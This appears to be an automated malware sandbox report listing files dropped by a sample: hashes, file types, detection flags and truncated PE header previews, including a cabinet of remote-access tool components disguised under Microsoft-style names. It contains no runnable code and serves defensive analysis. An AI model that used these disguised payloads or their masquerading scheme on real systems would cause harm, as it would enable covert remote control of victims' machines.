                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:ok
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3199488
                                                                                                                                                                                                                                                                        Entropy (8bit):6.325059792485986
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:2WGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TY:6tLutqgwh4NYxtJpkxhGj333T
                                                                                                                                                                                                                                                                        MD5:AD96645518D5ABDD4F96B007E799F61E
                                                                                                                                                                                                                                                                        SHA1:6F9EF4A1635C646710C4FB71DB3DAD0D9E5C754F
                                                                                                                                                                                                                                                                        SHA-256:BC267B0E5CE6F88EBB5CB9E309DD83096D7E33B597CACF9AB066989E836F056C
                                                                                                                                                                                                                                                                        SHA-512:21CF333F2024CFEF0F479823EB486BFEB9530BEEE4A20D6BB948E576F29571E8401A6AEF08106C582B71614CECA442BC6E6AFF60A5B493BCB8BE0A673B0D35F1
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\ZmWSzgevgt.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3199488
                                                                                                                                                                                                                                                                        Entropy (8bit):6.325059207580715
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:2WGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TY:6tLutqgwh4NYxtJpkxhGj333T
                                                                                                                                                                                                                                                                        MD5:BE0E74DC6AC70C5B8CC74C42B6999A70
                                                                                                                                                                                                                                                                        SHA1:47C9E3346F8C051EA7415289E25E7836AD47500C
                                                                                                                                                                                                                                                                        SHA-256:D5485BA921C2D67DF5D63763C4650CAD24D8B7D7C65202A8F9CB5F3DAFDFCF12
                                                                                                                                                                                                                                                                        SHA-512:A851ED78B6F8C0ECBE449A20347DEBF2804DA656372F66CE907A6A7E29C9B921F3234CD17B5A044891CADF5F23708E11EA521AB1A007E5C24A95763E7E545A9D
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2560
                                                                                                                                                                                                                                                                        Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 2424220 bytes, 15 files, at 0x2c +A "regid.1993-06.com.microsoft\atmfd.dll" +A "regid.1993-06.com.microsoft\client32.ini", number 1, 179 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2424220
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9975108289967425
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:49152:/Se9VNpXouUUoFe7QNMiDL4yLu69Ps7UnyqYMU2so:KUpXFUpFMQamBLu69076LYMU6
                                                                                                                                                                                                                                                                        MD5:A3609F5F1214472B2990C05F551B0E7A
                                                                                                                                                                                                                                                                        SHA1:EC57B5E136D96DF6366562C9B5C73AAD89D619A0
                                                                                                                                                                                                                                                                        SHA-256:1863E3B433E0086A5B1A22F034DEF8CCEE6CA74A12DD59796AE3D7456567DB33
                                                                                                                                                                                                                                                                        SHA-512:BB86D4011FEEB245E2F80AA4F8AAFD230C9CF3DEAAE8F2B056BA60B6DEB22710E34E91177A5011B4897A70D82CFCE44ACDF08D8DA072BF8A9C02B3D1295CC51D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MSCF......$.....,...................t..................RS4 .regid.1993-06.com.microsoft\atmfd.dll.x.........}Wz$ .regid.1993-06.com.microsoft\client32.ini...........}Wz$ .regid.1993-06.com.microsoft\client32u.ini.x..........I{. .regid.1993-06.com.microsoft\HTCTL32.DLL.P...~......Fn. .regid.1993-06.com.microsoft\msvcr100.dll.H.........6. .regid.1993-06.com.microsoft\nskbfltr.inf.:..........F.. .regid.1993-06.com.microsoft\NSM.ini.....P.....;U.@ .regid.1993-06.com.microsoft\NSM.LIC............<S. .regid.1993-06.com.microsoft\nsm_vpro.ini.x...A......I. .regid.1993-06.com.microsoft\pcicapi.dll.xI.../.....I. .regid.1993-06.com.microsoft\PCICHEK.DLL.x.9.1y.....I. .regid.1993-06.com.microsoft\PCICL32.DLL.x.....P....I@. .regid.1993-06.com.microsoft\remcmdstub.exe.x...!.Q....IL. .regid.1993-06.com.microsoft\TCCTL32.DLL.......W....W.} .regid.1993-06.com.microsoft\wmiprvse.exe..._..L..CK.{|SU.8..$m.)'..(j..."v,jkPs..z")T.PG.*L.G.J..#J.iKN.Gqd...3r..b......$-....*":.83..u@.RP.]k........
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3199488
                                                                                                                                                                                                                                                                        Entropy (8bit):6.325059360886426
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:2WGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TY:6tLutqgwh4NYxtJpkxhGj333T
                                                                                                                                                                                                                                                                        MD5:C039C014580F43E5B8162552F3CAF067
                                                                                                                                                                                                                                                                        SHA1:06F24F301DB285EE9B116143FE2951D47EA92AA3
                                                                                                                                                                                                                                                                        SHA-256:4F42DD2793620AFDA4CA8F796AD433033ACC8E52A98B0D65A772650B17E8FAD8
                                                                                                                                                                                                                                                                        SHA-512:7ECDBDF5B430138D91C692F8C7061039B5F7A55AD8A65F75D5EB46B4D0AB22BCDACD1B9595DB84CC3A8D137BA90499114B94F9785A8DE547212CD3F6506A3669
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4509696
                                                                                                                                                                                                                                                                        Entropy (8bit):6.100941182830929
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                                                                                                                                                                                                                                                                        MD5:F6153E803F1533042AC7E6988237C2C3
                                                                                                                                                                                                                                                                        SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                                                                                                                                                                                                                                                                        SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                                                                                                                                                                                                                                                                        SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):83128
                                                                                                                                                                                                                                                                        Entropy (8bit):6.654653670108596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                                                                                                                                                                                                                                                                        MD5:125B0F6BF378358E4F9C837FF6682D94
                                                                                                                                                                                                                                                                        SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                                                                                                                                                                                                                                                                        SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                                                                                                                                                                                                                                                                        SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5038592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.043058205786219
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                                                                                                                                                                        MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                                                                                                                                                                        SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                                                                                                                                                                        SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                                                                                                                                                                        SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4509696
                                                                                                                                                                                                                                                                        Entropy (8bit):6.100941182830929
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                                                                                                                                                                                                                                                                        MD5:F6153E803F1533042AC7E6988237C2C3
                                                                                                                                                                                                                                                                        SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                                                                                                                                                                                                                                                                        SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                                                                                                                                                                                                                                                                        SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):83128
                                                                                                                                                                                                                                                                        Entropy (8bit):6.654653670108596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                                                                                                                                                                                                                                                                        MD5:125B0F6BF378358E4F9C837FF6682D94
                                                                                                                                                                                                                                                                        SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                                                                                                                                                                                                                                                                        SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                                                                                                                                                                                                                                                                        SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}, Number of Words: 0, Subject: Windows Manager, Author: AW Manager, Name of Creating Application: Windows Manager, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Manager., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3986432
                                                                                                                                                                                                                                                                        Entropy (8bit):6.570721162159989
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:7BAYNADU8HZ3nqmAc4RQ8BtDAoB4aNXVW+hv+Ahi8RhZ2i/NToL5ZHd9ZP9Z9Lzq:WYNAD0tDrPhhoL/+e4UpzjM
                                                                                                                                                                                                                                                                        MD5:6024D8C2207FC4610416BEAF8D360527
                                                                                                                                                                                                                                                                        SHA1:793AB731B07BF86ECC3BA78E1B76DC2AA0B48F8A
                                                                                                                                                                                                                                                                        SHA-256:CB4CAD56EA5391E44DC661513C4F021C5272DB710CC1733251152D1CB0EB5829
                                                                                                                                                                                                                                                                        SHA-512:0BB9CD1EC8873137E654A94C21887B7D4C73A9E561563D52DDEC18377552D1A33D256487362BB614EBB3D804047427977B3EB0070C92FC43D0DD656AF13EEAB4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...................=...................................T.......|.......E...F...G...H...I...J...K...L...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t........................................... ...!.......................................................;...<...=...>...?...@.......................................................................................................................................................................................................................o...............)...@........................................................................................... ...!..."...#...$...%...&...'...(...6...*...7...,...-......./...0...1...2...3...4...5.......8...>...9...:...;...<...=...A...?...H...K...B...C...D...E...F...G...S...I...J.......L...M...N...O...P...Q...R...:...........V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1026936
                                                                                                                                                                                                                                                                        Entropy (8bit):6.391700413941365
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:lViYocX3hU49N1frFMDtpen0qZxVzCdUVdjKFoTo:LiYoM6EODtA0qZadUVdjKFoTo
                                                                                                                                                                                                                                                                        MD5:F95007206C6B2407FB69748EF7C93612
                                                                                                                                                                                                                                                                        SHA1:1B7B10470BCC56823A25274BCC3C4BFBEC76E428
                                                                                                                                                                                                                                                                        SHA-256:85CA1094E52A33019BE8EBEE09C580A31D4CAA846A6BE4412C58796BFC0FAB5A
                                                                                                                                                                                                                                                                        SHA-512:001975689CB431EC8E79D4A90597E8055DABF8E18C769818646BE7BA7708C57192956E0DC43EE3E25DD302F33246DDC226B5D6A660650878A2031B20E1B52752
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..7(.{d(.{d(.{d..xe&.{d..~e..{dJ..e;.{dJ.xe1.{dJ.~eu.{d...e3.{d..}e).{d..ze..{d(.zd..{d..reU.{d...d).{d..ye).{dRich(.{d........PE..L.....gb.........."..............................@.......................................@.....................................,.......4>..............x....0.......:..p...................@;..........@...............t...<........................text...o........................... ..`.rdata..2...........................@..@.data...D)..........................@....rsrc...4>.......@..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):211456
                                                                                                                                                                                                                                                                        Entropy (8bit):6.450132187386898
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:WltFwoJxZQ4fK70l5DqKtRnBBjGd4uM4h0lntiEnc2xMl4fTVERt:WaU87+3nHy6n0NGJERt
                                                                                                                                                                                                                                                                        MD5:8A3F1A0DA39530DCB8962DD0FADB187F
                                                                                                                                                                                                                                                                        SHA1:D5294F6BE549EC1F779DA78D903683BAB2835D1A
                                                                                                                                                                                                                                                                        SHA-256:C6988E36B1E1D6FFC89D9FA77AD35F132F5AA89E680D0155E0B6AEE1C524C99F
                                                                                                                                                                                                                                                                        SHA-512:1E0D5BE3EE164FB16DE629A975F3C3DA61659B99A0FC766850FFEEDDB2D32B7EE0D3B85C77F01D34D9FE2933BD7BD11C6DBA7B35D30FAED7CE09485FD706D49D
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+(..oI..oI..oI..;..eI..;...I...1..JI...1...I...1..yI..;..zI..;..hI..oI...I...0..3I...0..nI...0..nI..oIe.nI...0..nI..RichoI..................PE..L.....gb.........."!.....f................................................................@.................................\...<....... .......................@ ......p...............................@...............t............................text....d.......f.................. ..`.rdata...............j..............@..@.data...dV... ......................@....rsrc... ...........................@..@.reloc..@ ......."..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1026936
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                        MD5:59F47C235E8563ADFDF887F2278F4180
                                                                                                                                                                                                                                                                        SHA1:31986FB97FFCACEF24485FDB37B115F543A670B1
                                                                                                                                                                                                                                                                        SHA-256:4177989F2BC8C359B1F7774F2CAB70CB65DB9E569E975869A53F76FB109D75AA
                                                                                                                                                                                                                                                                        SHA-512:E9E487C6031AB1AB18DA04302FB53DF59140BF03D3DA082665337A7D628F9D37A3EF3530E359E83A7DB47755BDF79E09AC48AFF346C01380F7990BC838CA0125
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 6 12:33:21 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9720408453508687
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8L2dkOTEKzRdHKidAKZdA19ehwiZUklqehRdy+3:8LFOI6Rqwdy
